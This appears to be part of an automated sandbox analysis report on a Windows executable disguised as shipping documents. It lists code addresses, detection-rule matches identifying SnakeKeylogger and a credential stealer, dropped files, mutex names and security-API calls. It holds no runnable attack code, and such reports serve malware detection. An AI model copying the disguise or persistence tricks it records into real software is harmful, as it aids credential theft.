Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013BC738	9_2_013BC738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013B69B0	9_2_013B69B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013BE988	9_2_013BE988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013BCA08	9_2_013BCA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013BCCD8	9_2_013BCCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013BCFAA	9_2_013BCFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013BE97A	9_2_013BE97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013BF961	9_2_013BF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013B39EE	9_2_013B39EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013B29EC	9_2_013B29EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013B3AA1	9_2_013B3AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_013B3E09	9_2_013B3E09
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_02914859	10_2_02914859
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_02914868	10_2_02914868
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_05583140	10_2_05583140
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_05583107	10_2_05583107
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_0558AE50	10_2_0558AE50
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_05584E00	10_2_05584E00
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_070FEF18	10_2_070FEF18
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_070FEED8	10_2_070FEED8
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_07110308	10_2_07110308
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_07114CC0	10_2_07114CC0
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_0711B6E8	10_2_0711B6E8
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_07112380	10_2_07112380
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_071102F9	10_2_071102F9
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_0711D1F8	10_2_0711D1F8
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_071130F0	10_2_071130F0
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_07114F30	10_2_07114F30
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_07111F37	10_2_07111F37
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_07114F20	10_2_07114F20
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_0711BF58	10_2_0711BF58
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_07114EDF	10_2_07114EDF
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_07114CB3	10_2_07114CB3
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_0711BB20	10_2_0711BB20
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_0711DBF8	10_2_0711DBF8
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_0711DBE8	10_2_0711DBE8
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_07112840	10_2_07112840
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Code function: 10_2_08AF25D0	10_2_08AF25D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030A5362	14_2_030A5362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030AD278	14_2_030AD278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030A7118	14_2_030A7118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030AC146	14_2_030AC146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030AA088	14_2_030AA088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030AC738	14_2_030AC738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030AC468	14_2_030AC468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030ACA08	14_2_030ACA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030AE988	14_2_030AE988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030A69A0	14_2_030A69A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030ACFAA	14_2_030ACFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030ACCD8	14_2_030ACCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030A3AA1	14_2_030A3AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030AF961	14_2_030AF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030AE97A	14_2_030AE97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030A39EE	14_2_030A39EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030A29EC	14_2_030A29EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_030A3E09	14_2_030A3E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C91E80	14_2_06C91E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9E258	14_2_06C9E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C917A0	14_2_06C917A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C90B30	14_2_06C90B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9FC68	14_2_06C9FC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C99C70	14_2_06C99C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C95028	14_2_06C95028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C99548	14_2_06C99548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C92968	14_2_06C92968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9EAF8	14_2_06C9EAF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9E6A0	14_2_06C9E6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9E6B0	14_2_06C9E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9E249	14_2_06C9E249
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C91E70	14_2_06C91E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9DE00	14_2_06C9DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C99BFA	14_2_06C99BFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9178F	14_2_06C9178F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C98B91	14_2_06C98B91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9F3A8	14_2_06C9F3A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C98BA0	14_2_06C98BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9F3B8	14_2_06C9F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9EF51	14_2_06C9EF51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9EF60	14_2_06C9EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9EB08	14_2_06C9EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C99328	14_2_06C99328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C90B20	14_2_06C90B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9D0F8	14_2_06C9D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9CC8F	14_2_06C9CC8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9CCA0	14_2_06C9CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C90040	14_2_06C90040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9F801	14_2_06C9F801
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C90006	14_2_06C90006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C95018	14_2_06C95018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9F810	14_2_06C9F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9DDF1	14_2_06C9DDF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9D999	14_2_06C9D999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9D9A8	14_2_06C9D9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9D540	14_2_06C9D540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C92959	14_2_06C92959
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 14_2_06C9D550	14_2_06C9D550

Source: rShippingDocuments240384.exe, 00000000.00000002.1485239345.00000000015AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs rShippingDocuments240384.exe
Source: rShippingDocuments240384.exe, 00000000.00000000.1439702882.0000000001014000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedKuN.exe8 vs rShippingDocuments240384.exe
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs rShippingDocuments240384.exe
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs rShippingDocuments240384.exe
Source: rShippingDocuments240384.exe, 00000000.00000002.1486523776.0000000003534000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs rShippingDocuments240384.exe
Source: rShippingDocuments240384.exe, 00000000.00000002.1494359208.0000000009650000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs rShippingDocuments240384.exe
Source: rShippingDocuments240384.exe	Binary or memory string: OriginalFilenamedKuN.exe8 vs rShippingDocuments240384.exe

Source: rShippingDocuments240384.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: rShippingDocuments240384.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: tdcorV.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, j.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, j.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, --.cs

Base64 encoded string: 'yZwG7FMnGGuocSJ7OLYaO9AHE2xGTJkuaGU76Yb25AT1Z/62t6lZAA=='

Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: _0020.SetAccessControl
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: _0020.AddAccessRule
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: _0020.SetAccessControl
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: _0020.AddAccessRule
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: _0020.SetAccessControl
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: _0020.AddAccessRule
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: _0020.SetAccessControl
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: _0020.AddAccessRule
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: _0020.SetAccessControl
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs	Security API names: _0020.AddAccessRule
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, bqiyp6LBwn3U12aRJ6.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@4/4

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe

File created: C:\Users\user\AppData\Roaming\tdcorV.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Mutant created: \Sessions\1\BaseNamedObjects\wpQVdupdPuCCieiuNojCBKi
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4520:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5520:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3836:120:WilError_03

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe

File created: C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp

Jump to behavior

Source: rShippingDocuments240384.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: rShippingDocuments240384.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

